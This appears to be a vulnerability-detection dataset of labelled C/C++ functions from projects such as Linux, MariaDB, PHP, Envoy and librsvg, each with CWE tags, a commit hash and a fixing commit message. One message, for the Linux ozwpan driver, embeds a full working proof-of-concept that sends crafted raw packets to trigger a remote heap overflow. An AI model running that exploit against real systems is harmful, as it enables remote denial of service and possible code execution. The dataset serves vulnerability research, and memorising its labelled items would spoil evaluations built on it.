perf: Treat attr.config as u64 in perf_swevent_init() Trinity discovered that we fail to check all 64 bits of attr.config passed by user space, resulting to out-of-bounds access of the perf_swevent_enabled array in sw_perf_event_destroy(). Introduced in commit b0a873ebb ("perf: Register PMU implementations"). Signed-off-by: Tommi Rantala <[email protected]> Cc: Peter Zijlstra <[email protected]> Cc: [email protected] Cc: Paul Mackerras <[email protected]> Cc: Arnaldo Carvalho de Melo <[email protected]> Link: http://lkml.kernel.org/r/[email protected] Signed-off-by: Ingo Molnar <[email protected]>
void setattr_copy(struct inode *inode, const struct iattr *attr) { unsigned int ia_valid = attr->ia_valid; if (ia_valid & ATTR_UID) inode->i_uid = attr->ia_uid; if (ia_valid & ATTR_GID) inode->i_gid = attr->ia_gid; if (ia_valid & ATTR_ATIME) inode->i_atime = timespec_trunc(attr->ia_atime, inode->i_sb->s_time_gran); if (ia_valid & ATTR_MTIME) inode->i_mtime = timespec_trunc(attr->ia_mtime, inode->i_sb->s_time_gran); if (ia_valid & ATTR_CTIME) inode->i_ctime = timespec_trunc(attr->ia_ctime, inode->i_sb->s_time_gran); if (ia_valid & ATTR_MODE) { umode_t mode = attr->ia_mode; if (!in_group_p(inode->i_gid) && !capable_wrt_inode_uidgid(inode, CAP_FSETID)) mode &= ~S_ISGID; inode->i_mode = mode; } }
0
[ "CWE-284", "CWE-264" ]
linux
23adbe12ef7d3d4195e80800ab36b37bee28cd03
3,535,170,711,390,075,000,000,000,000,000,000,000
26
fs,userns: Change inode_capable to capable_wrt_inode_uidgid The kernel has no concept of capabilities with respect to inodes; inodes exist independently of namespaces. For example, inode_capable(inode, CAP_LINUX_IMMUTABLE) would be nonsense. This patch changes inode_capable to check for uid and gid mappings and renames it to capable_wrt_inode_uidgid, which should make it more obvious what it does. Fixes CVE-2014-4014. Cc: Theodore Ts'o <[email protected]> Cc: Serge Hallyn <[email protected]> Cc: "Eric W. Biederman" <[email protected]> Cc: Dave Chinner <[email protected]> Cc: [email protected] Signed-off-by: Andy Lutomirski <[email protected]> Signed-off-by: Linus Torvalds <[email protected]>
int multi_update::do_updates() { TABLE_LIST *cur_table; int local_error= 0; ha_rows org_updated; TABLE *table, *tmp_table, *err_table; List_iterator_fast<TABLE> check_opt_it(unupdated_check_opt_tables); DBUG_ENTER("multi_update::do_updates"); do_update= 0; // Don't retry this function if (!found) DBUG_RETURN(0); /* Update read_set to include all fields that virtual columns may depend on. Usually they're already in the read_set, but if the previous access method was keyread, only the virtual column itself will be in read_set, not its dependencies */ while(TABLE *tbl= check_opt_it++) { if (tbl->vcol_set) { bitmap_clear_all(tbl->vcol_set); for (Field **vf= tbl->vfield; *vf; vf++) { if (bitmap_is_set(tbl->read_set, (*vf)->field_index)) tbl->mark_virtual_col(*vf); } } } for (cur_table= update_tables; cur_table; cur_table= cur_table->next_local) { bool can_compare_record; uint offset= cur_table->shared; table = cur_table->table; if (table == table_to_update) continue; // Already updated org_updated= updated; tmp_table= tmp_tables[cur_table->shared]; tmp_table->file->extra(HA_EXTRA_CACHE); // Change to read cache if (unlikely((local_error= table->file->ha_rnd_init(0)))) { err_table= table; goto err; } table->file->extra(HA_EXTRA_NO_CACHE); /* We have to clear the base record, if we have virtual indexed blob fields, as some storage engines will access the blob fields to calculate the keys to see if they have changed. Without clearing the blob pointers will contain random values which can cause a crash. This is a workaround for engines that access columns not present in either read or write set. 
*/ if (table->vfield) empty_record(table); has_vers_fields= table->vers_check_update(*fields); check_opt_it.rewind(); while(TABLE *tbl= check_opt_it++) { if (unlikely((local_error= tbl->file->ha_rnd_init(0)))) { err_table= tbl; goto err; } tbl->file->extra(HA_EXTRA_CACHE); } /* Setup copy functions to copy fields from temporary table */ List_iterator_fast<Item> field_it(*fields_for_table[offset]); Field **field; Copy_field *copy_field_ptr= copy_field, *copy_field_end; /* Skip row pointers */ field= tmp_table->field + 1 + unupdated_check_opt_tables.elements; for ( ; *field ; field++) { Item_field *item= (Item_field* ) field_it++; (copy_field_ptr++)->set(item->field, *field, 0); } copy_field_end=copy_field_ptr; if (unlikely((local_error= tmp_table->file->ha_rnd_init(1)))) { err_table= tmp_table; goto err; } can_compare_record= records_are_comparable(table); for (;;) { if (thd->killed && trans_safe) { thd->fatal_error(); goto err2; } if (unlikely((local_error= tmp_table->file->ha_rnd_next(tmp_table->record[0])))) { if (local_error == HA_ERR_END_OF_FILE) break; err_table= tmp_table; goto err; } /* call rnd_pos() using rowids from temporary table */ check_opt_it.rewind(); TABLE *tbl= table; uint field_num= 0; do { DBUG_ASSERT(!tmp_table->field[field_num]->is_null()); if (unlikely((local_error= tbl->file->ha_rnd_pos(tbl->record[0], (uchar *) tmp_table-> field[field_num]->ptr)))) { err_table= tbl; goto err; } field_num++; } while ((tbl= check_opt_it++)); if (table->vfield && unlikely(table->update_virtual_fields(table->file, VCOL_UPDATE_INDEXED_FOR_UPDATE))) goto err2; table->status|= STATUS_UPDATED; store_record(table,record[1]); /* Copy data from temporary table to current table */ for (copy_field_ptr=copy_field; copy_field_ptr != copy_field_end; copy_field_ptr++) { (*copy_field_ptr->do_copy)(copy_field_ptr); copy_field_ptr->to_field->set_has_explicit_value(); } table->evaluate_update_default_function(); if (table->vfield && table->update_virtual_fields(table->file, 
VCOL_UPDATE_FOR_WRITE)) goto err2; if (table->triggers && table->triggers->process_triggers(thd, TRG_EVENT_UPDATE, TRG_ACTION_BEFORE, TRUE)) goto err2; if (!can_compare_record || compare_record(table)) { int error; if ((error= cur_table->view_check_option(thd, ignore)) != VIEW_CHECK_OK) { if (error == VIEW_CHECK_SKIP) continue; else if (unlikely(error == VIEW_CHECK_ERROR)) { thd->fatal_error(); goto err2; } } if (has_vers_fields && table->versioned()) table->vers_update_fields(); if (unlikely((local_error= table->file->ha_update_row(table->record[1], table->record[0]))) && local_error != HA_ERR_RECORD_IS_THE_SAME) { if (!ignore || table->file->is_fatal_error(local_error, HA_CHECK_ALL)) { err_table= table; goto err; } } if (local_error != HA_ERR_RECORD_IS_THE_SAME) { updated++; if (has_vers_fields && table->versioned()) { if (table->versioned(VERS_TIMESTAMP)) { store_record(table, record[2]); if ((local_error= vers_insert_history_row(table))) { restore_record(table, record[2]); err_table = table; goto err; } restore_record(table, record[2]); } updated_sys_ver++; } } else local_error= 0; } if (table->triggers && unlikely(table->triggers->process_triggers(thd, TRG_EVENT_UPDATE, TRG_ACTION_AFTER, TRUE))) goto err2; } if (updated != org_updated) { if (table->file->has_transactions()) transactional_tables= TRUE; else { trans_safe= FALSE; // Can't do safe rollback thd->transaction.stmt.modified_non_trans_table= TRUE; } } (void) table->file->ha_rnd_end(); (void) tmp_table->file->ha_rnd_end(); check_opt_it.rewind(); while (TABLE *tbl= check_opt_it++) tbl->file->ha_rnd_end(); } DBUG_RETURN(0); err: { prepare_record_for_error_message(local_error, err_table); err_table->file->print_error(local_error,MYF(ME_FATALERROR)); } err2: if (table->file->inited) (void) table->file->ha_rnd_end(); if (tmp_table->file->inited) (void) tmp_table->file->ha_rnd_end(); check_opt_it.rewind(); while (TABLE *tbl= check_opt_it++) { if (tbl->file->inited) (void) tbl->file->ha_rnd_end(); } if 
(updated != org_updated) { if (table->file->has_transactions()) transactional_tables= TRUE; else { trans_safe= FALSE; thd->transaction.stmt.modified_non_trans_table= TRUE; } } DBUG_RETURN(1); }
0
[ "CWE-617" ]
server
ecb6f9c894d3ebafeff1c6eb3b65cd248062296f
48,668,189,709,956,170,000,000,000,000,000,000,000
266
MDEV-28095 crash in multi-update and implicit grouping disallow implicit grouping in multi-update. explicit GROUP BY is not allowed by the grammar.
static void oz_plat_shutdown(struct platform_device *dev) { }
0
[ "CWE-703", "CWE-189" ]
linux
b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c
63,592,330,609,522,140,000,000,000,000,000,000,000
3
ozwpan: Use unsigned ints to prevent heap overflow Using signed integers, the subtraction between required_size and offset could wind up being negative, resulting in a memcpy into a heap buffer with a negative length, resulting in huge amounts of network-supplied data being copied into the heap, which could potentially lead to remote code execution.. This is remotely triggerable with a magic packet. A PoC which obtains DoS follows below. It requires the ozprotocol.h file from this module. =-=-=-=-=-= #include <arpa/inet.h> #include <linux/if_packet.h> #include <net/if.h> #include <netinet/ether.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <endian.h> #include <sys/ioctl.h> #include <sys/socket.h> #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t 
*)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; } __packed connect_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 35, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 } }; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_get_desc_rsp oz_get_desc_rsp; } __packed pwn_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(1) }, .oz_elt = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_get_desc_rsp) }, .oz_get_desc_rsp = { .app_id = OZ_APPID_USB, .elt_seq_num = 0, .type = OZ_GET_DESC_RSP, .req_id = 0, .offset = htole16(2), .total_size = htole16(1), .rcode = 0, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr 
*)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } usleep(300000); if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. Donenfeld <[email protected]> Acked-by: Dan Carpenter <[email protected]> Cc: stable <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
static int ZEND_FASTCALL zend_fetch_var_address_helper_SPEC_CONST(int type, ZEND_OPCODE_HANDLER_ARGS) { zend_op *opline = EX(opline); zend_free_op free_op1; zval *varname = &opline->op1.u.constant; zval **retval; zval tmp_varname; HashTable *target_symbol_table; if (IS_CONST != IS_CONST && Z_TYPE_P(varname) != IS_STRING) { tmp_varname = *varname; zval_copy_ctor(&tmp_varname); convert_to_string(&tmp_varname); varname = &tmp_varname; } if (opline->op2.u.EA.type == ZEND_FETCH_STATIC_MEMBER) { retval = zend_std_get_static_property(EX_T(opline->op2.u.var).class_entry, Z_STRVAL_P(varname), Z_STRLEN_P(varname), 0 TSRMLS_CC); } else { target_symbol_table = zend_get_target_symbol_table(opline, EX(Ts), type, varname TSRMLS_CC); /* if (!target_symbol_table) { ZEND_VM_NEXT_OPCODE(); } */ if (zend_hash_find(target_symbol_table, varname->value.str.val, varname->value.str.len+1, (void **) &retval) == FAILURE) { switch (type) { case BP_VAR_R: case BP_VAR_UNSET: zend_error(E_NOTICE,"Undefined variable: %s", Z_STRVAL_P(varname)); /* break missing intentionally */ case BP_VAR_IS: retval = &EG(uninitialized_zval_ptr); break; case BP_VAR_RW: zend_error(E_NOTICE,"Undefined variable: %s", Z_STRVAL_P(varname)); /* break missing intentionally */ case BP_VAR_W: { zval *new_zval = &EG(uninitialized_zval); Z_ADDREF_P(new_zval); zend_hash_update(target_symbol_table, varname->value.str.val, varname->value.str.len+1, &new_zval, sizeof(zval *), (void **) &retval); } break; EMPTY_SWITCH_DEFAULT_CASE() } } switch (opline->op2.u.EA.type) { case ZEND_FETCH_GLOBAL: if (IS_CONST != IS_TMP_VAR) { } break; case ZEND_FETCH_LOCAL: break; case ZEND_FETCH_STATIC: zval_update_constant(retval, (void*) 1 TSRMLS_CC); break; case ZEND_FETCH_GLOBAL_LOCK: if (IS_CONST == IS_VAR && !free_op1.var) { PZVAL_LOCK(*EX_T(opline->op1.u.var).var.ptr_ptr); } break; } } if (IS_CONST != IS_CONST && varname == &tmp_varname) { zval_dtor(varname); } if (!RETURN_VALUE_UNUSED(&opline->result)) { if (opline->extended_value & 
ZEND_FETCH_MAKE_REF) { SEPARATE_ZVAL_TO_MAKE_IS_REF(retval); } PZVAL_LOCK(*retval); switch (type) { case BP_VAR_R: case BP_VAR_IS: AI_SET_PTR(EX_T(opline->result.u.var).var, *retval); break; case BP_VAR_UNSET: { zend_free_op free_res; EX_T(opline->result.u.var).var.ptr_ptr = retval; PZVAL_UNLOCK(*EX_T(opline->result.u.var).var.ptr_ptr, &free_res); if (EX_T(opline->result.u.var).var.ptr_ptr != &EG(uninitialized_zval_ptr)) { SEPARATE_ZVAL_IF_NOT_REF(EX_T(opline->result.u.var).var.ptr_ptr); } PZVAL_LOCK(*EX_T(opline->result.u.var).var.ptr_ptr); FREE_OP_VAR_PTR(free_res); break; default: EX_T(opline->result.u.var).var.ptr_ptr = retval; break; } } } ZEND_VM_NEXT_OPCODE(); }
0
[]
php-src
ce96fd6b0761d98353761bf78d5bfb55291179fd
293,516,145,490,800,830,000,000,000,000,000,000,000
101
- fix #39863, do not accept paths with NULL in them. See http://news.php.net/php.internals/50191, trunk will have the patch later (adding a macro and/or changing (some) APIs. Patch by Rasmus
file_list_cancel (NautilusDirectory *directory) { directory_load_cancel (directory); if (directory->details->dequeue_pending_idle_id != 0) { g_source_remove (directory->details->dequeue_pending_idle_id); directory->details->dequeue_pending_idle_id = 0; } if (directory->details->pending_file_info != NULL) { eel_g_object_list_free (directory->details->pending_file_info); directory->details->pending_file_info = NULL; } if (directory->details->hidden_file_hash) { g_hash_table_foreach_remove (directory->details->hidden_file_hash, remove_callback, NULL); } }
0
[]
nautilus
7632a3e13874a2c5e8988428ca913620a25df983
93,162,714,150,591,850,000,000,000,000,000,000,000
18
Check for trusted desktop file launchers. 2009-02-24 Alexander Larsson <[email protected]> * libnautilus-private/nautilus-directory-async.c: Check for trusted desktop file launchers. * libnautilus-private/nautilus-file-private.h: * libnautilus-private/nautilus-file.c: * libnautilus-private/nautilus-file.h: Add nautilus_file_is_trusted_link. Allow unsetting of custom display name. * libnautilus-private/nautilus-mime-actions.c: Display dialog when trying to launch a non-trusted desktop file. svn path=/trunk/; revision=15003
StreamInfoImpl( Http::Protocol protocol, TimeSource& time_source, const Network::ConnectionInfoProviderSharedPtr& downstream_connection_info_provider, FilterStateSharedPtr parent_filter_state, FilterState::LifeSpan life_span) : StreamInfoImpl( protocol, time_source, downstream_connection_info_provider, std::make_shared<FilterStateImpl>( FilterStateImpl::LazyCreateAncestor(std::move(parent_filter_state), life_span), FilterState::LifeSpan::FilterChain)) {}
0
[ "CWE-416" ]
envoy
fe7c69c248f4fe5a9080c7ccb35275b5218bb5ab
294,117,978,201,771,100,000,000,000,000,000,000,000
9
internal redirect: fix a lifetime bug (#785) Signed-off-by: Alyssa Wilk <[email protected]> Signed-off-by: Matt Klein <[email protected]> Signed-off-by: Pradeep Rao <[email protected]>
copy_msg(struct regional* region, struct lruhash_entry* e, struct query_info** k, struct reply_info** d) { struct reply_info* rep = (struct reply_info*)e->data; if(rep->rrset_count > RR_COUNT_MAX) return 0; /* to protect against integer overflow */ *d = (struct reply_info*)regional_alloc_init(region, e->data, sizeof(struct reply_info) + sizeof(struct rrset_ref) * (rep->rrset_count-1) + sizeof(struct ub_packed_rrset_key*) * rep->rrset_count); if(!*d) return 0; (*d)->rrsets = (struct ub_packed_rrset_key**)(void *)( (uint8_t*)(&((*d)->ref[0])) + sizeof(struct rrset_ref) * rep->rrset_count); *k = (struct query_info*)regional_alloc_init(region, e->key, sizeof(struct query_info)); if(!*k) return 0; (*k)->qname = regional_alloc_init(region, (*k)->qname, (*k)->qname_len); return (*k)->qname != NULL; }
0
[ "CWE-613", "CWE-703" ]
unbound
f6753a0f1018133df552347a199e0362fc1dac68
142,674,918,584,038,600,000,000,000,000,000,000,000
23
- Fix the novel ghost domain issues CVE-2022-30698 and CVE-2022-30699.
ieee80211_sched_scan_start(struct wiphy *wiphy, struct net_device *dev, struct cfg80211_sched_scan_request *req) { struct ieee80211_sub_if_data *sdata = IEEE80211_DEV_TO_SUB_IF(dev); if (!sdata->local->ops->sched_scan_start) return -EOPNOTSUPP; return ieee80211_request_sched_scan_start(sdata, req); }
0
[ "CWE-287" ]
linux
3e493173b7841259a08c5c8e5cbe90adb349da7e
273,770,752,746,339,280,000,000,000,000,000,000,000
11
mac80211: Do not send Layer 2 Update frame before authorization The Layer 2 Update frame is used to update bridges when a station roams to another AP even if that STA does not transmit any frames after the reassociation. This behavior was described in IEEE Std 802.11F-2003 as something that would happen based on MLME-ASSOCIATE.indication, i.e., before completing 4-way handshake. However, this IEEE trial-use recommended practice document was published before RSN (IEEE Std 802.11i-2004) and as such, did not consider RSN use cases. Furthermore, IEEE Std 802.11F-2003 was withdrawn in 2006 and as such, has not been maintained amd should not be used anymore. Sending out the Layer 2 Update frame immediately after association is fine for open networks (and also when using SAE, FT protocol, or FILS authentication when the station is actually authenticated by the time association completes). However, it is not appropriate for cases where RSN is used with PSK or EAP authentication since the station is actually fully authenticated only once the 4-way handshake completes after authentication and attackers might be able to use the unauthenticated triggering of Layer 2 Update frame transmission to disrupt bridge behavior. Fix this by postponing transmission of the Layer 2 Update frame from station entry addition to the point when the station entry is marked authorized. Similarly, send out the VLAN binding update only if the STA entry has already been authorized. Signed-off-by: Jouni Malinen <[email protected]> Reviewed-by: Johannes Berg <[email protected]> Signed-off-by: David S. Miller <[email protected]>
Status KernelAndDeviceOp::Init(const Context& ctx, const NodeDef& ndef, GraphCollector* graph_collector) { OpKernel* k = nullptr; if (flr_ == nullptr) { return errors::Internal( "A valid FunctionLibraryRuntime must be provided when running ops " "based on OpKernel."); } std::shared_ptr<const NodeProperties> props; TF_RETURN_IF_ERROR(NodeProperties::CreateFromNodeDef( ndef, flr_->GetFunctionLibraryDefinition(), &props)); TF_RETURN_IF_ERROR(flr_->CreateKernel(props, &k)); kernel_.reset(k); input_alloc_attrs_.resize(kernel_->num_inputs()); input_devices_.resize(kernel_->num_inputs(), device_); for (size_t i = 0; i < input_alloc_attrs_.size(); ++i) { bool host = kernel_->input_memory_types()[i] == tensorflow::HOST_MEMORY; input_alloc_attrs_[i].set_on_host(host); if (host) { input_devices_[i] = host_cpu_device_; } } output_alloc_attrs_.resize(kernel_->num_outputs()); for (size_t i = 0; i < output_alloc_attrs_.size(); ++i) { output_alloc_attrs_[i].set_on_host(kernel_->output_memory_types()[i] == tensorflow::HOST_MEMORY); } return Status::OK(); }
0
[ "CWE-476", "CWE-369" ]
tensorflow
da8558533d925694483d2c136a9220d6d49d843c
129,103,471,789,584,780,000,000,000,000,000,000,000
31
Fix undefined behavior in `tf.raw_ops.Switch` in eager mode. PiperOrigin-RevId: 332578058 Change-Id: I9727571d2f21476b10d8aa27c1b7176564b76ac9
void HeaderMapImpl::HeaderEntryImpl::value(const HeaderEntry& header) { value(header.value().getStringView()); }
0
[ "CWE-400", "CWE-703" ]
envoy
afc39bea36fd436e54262f150c009e8d72db5014
85,936,018,631,232,030,000,000,000,000,000,000,000
3
Track byteSize of HeaderMap internally. Introduces a cached byte size updated internally in HeaderMap. The value is stored as an optional, and is cleared whenever a non-const pointer or reference to a HeaderEntry is accessed. The cached value can be set with refreshByteSize() which performs an iteration over the HeaderMap to sum the size of each key and value in the HeaderMap. Signed-off-by: Asra Ali <[email protected]>
static bool mtrr_is_enabled(struct kvm_mtrr *mtrr_state) { return !!(mtrr_state->deftype & IA32_MTRR_DEF_TYPE_E); }
0
[ "CWE-284" ]
linux
9842df62004f366b9fed2423e24df10542ee0dc5
161,608,701,687,464,980,000,000,000,000,000,000,000
4
KVM: MTRR: remove MSR 0x2f8 MSR 0x2f8 accessed the 124th Variable Range MTRR ever since MTRR support was introduced by 9ba075a664df ("KVM: MTRR support"). 0x2f8 became harmful when 910a6aae4e2e ("KVM: MTRR: exactly define the size of variable MTRRs") shrinked the array of VR MTRRs from 256 to 8, which made access to index 124 out of bounds. The surrounding code only WARNs in this situation, thus the guest gained a limited read/write access to struct kvm_arch_vcpu. 0x2f8 is not a valid VR MTRR MSR, because KVM has/advertises only 16 VR MTRR MSRs, 0x200-0x20f. Every VR MTRR is set up using two MSRs, 0x2f8 was treated as a PHYSBASE and 0x2f9 would be its PHYSMASK, but 0x2f9 was not implemented in KVM, therefore 0x2f8 could never do anything useful and getting rid of it is safe. This fixes CVE-2016-3713. Fixes: 910a6aae4e2e ("KVM: MTRR: exactly define the size of variable MTRRs") Cc: [email protected] Reported-by: David Matlack <[email protected]> Signed-off-by: Andy Honig <[email protected]> Signed-off-by: Radim Krčmář <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]>
inline void process_header() { handler_->handle_header(); }
0
[ "CWE-416" ]
Crow
fba01dc76d6ea940ad7c8392e8f39f9647241d8e
132,797,139,447,303,500,000,000,000,000,000,000,000
4
Prevent HTTP pipelining which Crow doesn't support.
rsvg_parse_style_pair (RsvgHandle * ctx, RsvgState * state, const gchar * name, const gchar * value, gboolean important) { StyleValueData *data; data = g_hash_table_lookup (state->styles, name); if (data && data->important && !important) return; if (name == NULL || value == NULL) return; g_hash_table_insert (state->styles, (gpointer) g_strdup (name), (gpointer) style_value_data_new (value, important)); if (g_str_equal (name, "color")) state->current_color = rsvg_css_parse_color (value, &state->has_current_color); else if (g_str_equal (name, "opacity")) state->opacity = rsvg_css_parse_opacity (value); else if (g_str_equal (name, "flood-color")) state->flood_color = rsvg_css_parse_color (value, &state->has_flood_color); else if (g_str_equal (name, "flood-opacity")) { state->flood_opacity = rsvg_css_parse_opacity (value); state->has_flood_opacity = TRUE; } else if (g_str_equal (name, "filter")) state->filter = rsvg_filter_parse (ctx->priv->defs, value); else if (g_str_equal (name, "a:adobe-blending-mode")) { if (g_str_equal (value, "normal")) state->adobe_blend = 0; else if (g_str_equal (value, "multiply")) state->adobe_blend = 1; else if (g_str_equal (value, "screen")) state->adobe_blend = 2; else if (g_str_equal (value, "darken")) state->adobe_blend = 3; else if (g_str_equal (value, "lighten")) state->adobe_blend = 4; else if (g_str_equal (value, "softlight")) state->adobe_blend = 5; else if (g_str_equal (value, "hardlight")) state->adobe_blend = 6; else if (g_str_equal (value, "colordodge")) state->adobe_blend = 7; else if (g_str_equal (value, "colorburn")) state->adobe_blend = 8; else if (g_str_equal (value, "overlay")) state->adobe_blend = 9; else if (g_str_equal (value, "exclusion")) state->adobe_blend = 10; else if (g_str_equal (value, "difference")) state->adobe_blend = 11; else state->adobe_blend = 0; } else if (g_str_equal (name, "mask")) state->mask = rsvg_mask_parse (ctx->priv->defs, value); else if (g_str_equal (name, "clip-path")) { state->clip_path_ref 
= rsvg_clip_path_parse (ctx->priv->defs, value); } else if (g_str_equal (name, "overflow")) { if (!g_str_equal (value, "inherit")) { state->overflow = rsvg_css_parse_overflow (value, &state->has_overflow); } } else if (g_str_equal (name, "enable-background")) { if (g_str_equal (value, "new")) state->enable_background = RSVG_ENABLE_BACKGROUND_NEW; else state->enable_background = RSVG_ENABLE_BACKGROUND_ACCUMULATE; } else if (g_str_equal (name, "comp-op")) { if (g_str_equal (value, "clear")) state->comp_op = CAIRO_OPERATOR_CLEAR; else if (g_str_equal (value, "src")) state->comp_op = CAIRO_OPERATOR_SOURCE; else if (g_str_equal (value, "dst")) state->comp_op = CAIRO_OPERATOR_DEST; else if (g_str_equal (value, "src-over")) state->comp_op = CAIRO_OPERATOR_OVER; else if (g_str_equal (value, "dst-over")) state->comp_op = CAIRO_OPERATOR_DEST_OVER; else if (g_str_equal (value, "src-in")) state->comp_op = CAIRO_OPERATOR_IN; else if (g_str_equal (value, "dst-in")) state->comp_op = CAIRO_OPERATOR_DEST_IN; else if (g_str_equal (value, "src-out")) state->comp_op = CAIRO_OPERATOR_OUT; else if (g_str_equal (value, "dst-out")) state->comp_op = CAIRO_OPERATOR_DEST_OUT; else if (g_str_equal (value, "src-atop")) state->comp_op = CAIRO_OPERATOR_ATOP; else if (g_str_equal (value, "dst-atop")) state->comp_op = CAIRO_OPERATOR_DEST_ATOP; else if (g_str_equal (value, "xor")) state->comp_op = CAIRO_OPERATOR_XOR; else if (g_str_equal (value, "plus")) state->comp_op = CAIRO_OPERATOR_ADD; else if (g_str_equal (value, "multiply")) state->comp_op = CAIRO_OPERATOR_MULTIPLY; else if (g_str_equal (value, "screen")) state->comp_op = CAIRO_OPERATOR_SCREEN; else if (g_str_equal (value, "overlay")) state->comp_op = CAIRO_OPERATOR_OVERLAY; else if (g_str_equal (value, "darken")) state->comp_op = CAIRO_OPERATOR_DARKEN; else if (g_str_equal (value, "lighten")) state->comp_op = CAIRO_OPERATOR_LIGHTEN; else if (g_str_equal (value, "color-dodge")) state->comp_op = CAIRO_OPERATOR_COLOR_DODGE; else if 
(g_str_equal (value, "color-burn")) state->comp_op = CAIRO_OPERATOR_COLOR_BURN; else if (g_str_equal (value, "hard-light")) state->comp_op = CAIRO_OPERATOR_HARD_LIGHT; else if (g_str_equal (value, "soft-light")) state->comp_op = CAIRO_OPERATOR_SOFT_LIGHT; else if (g_str_equal (value, "difference")) state->comp_op = CAIRO_OPERATOR_DIFFERENCE; else if (g_str_equal (value, "exclusion")) state->comp_op = CAIRO_OPERATOR_EXCLUSION; else state->comp_op = CAIRO_OPERATOR_OVER; } else if (g_str_equal (name, "display")) { state->has_visible = TRUE; if (g_str_equal (value, "none")) state->visible = FALSE; else if (!g_str_equal (value, "inherit") != 0) state->visible = TRUE; else state->has_visible = FALSE; } else if (g_str_equal (name, "xml:space")) { state->has_space_preserve = TRUE; if (g_str_equal (value, "default")) state->space_preserve = FALSE; else if (!g_str_equal (value, "preserve") == 0) state->space_preserve = TRUE; else state->space_preserve = FALSE; } else if (g_str_equal (name, "visibility")) { state->has_visible = TRUE; if (g_str_equal (value, "visible")) state->visible = TRUE; else if (!g_str_equal (value, "inherit") != 0) state->visible = FALSE; /* collapse or hidden */ else state->has_visible = FALSE; } else if (g_str_equal (name, "fill")) { RsvgPaintServer *fill = state->fill; state->fill = rsvg_paint_server_parse (&state->has_fill_server, ctx->priv->defs, value, 0); rsvg_paint_server_unref (fill); } else if (g_str_equal (name, "fill-opacity")) { state->fill_opacity = rsvg_css_parse_opacity (value); state->has_fill_opacity = TRUE; } else if (g_str_equal (name, "fill-rule")) { state->has_fill_rule = TRUE; if (g_str_equal (value, "nonzero")) state->fill_rule = CAIRO_FILL_RULE_WINDING; else if (g_str_equal (value, "evenodd")) state->fill_rule = CAIRO_FILL_RULE_EVEN_ODD; else state->has_fill_rule = FALSE; } else if (g_str_equal (name, "clip-rule")) { state->has_clip_rule = TRUE; if (g_str_equal (value, "nonzero")) state->clip_rule = CAIRO_FILL_RULE_WINDING; else 
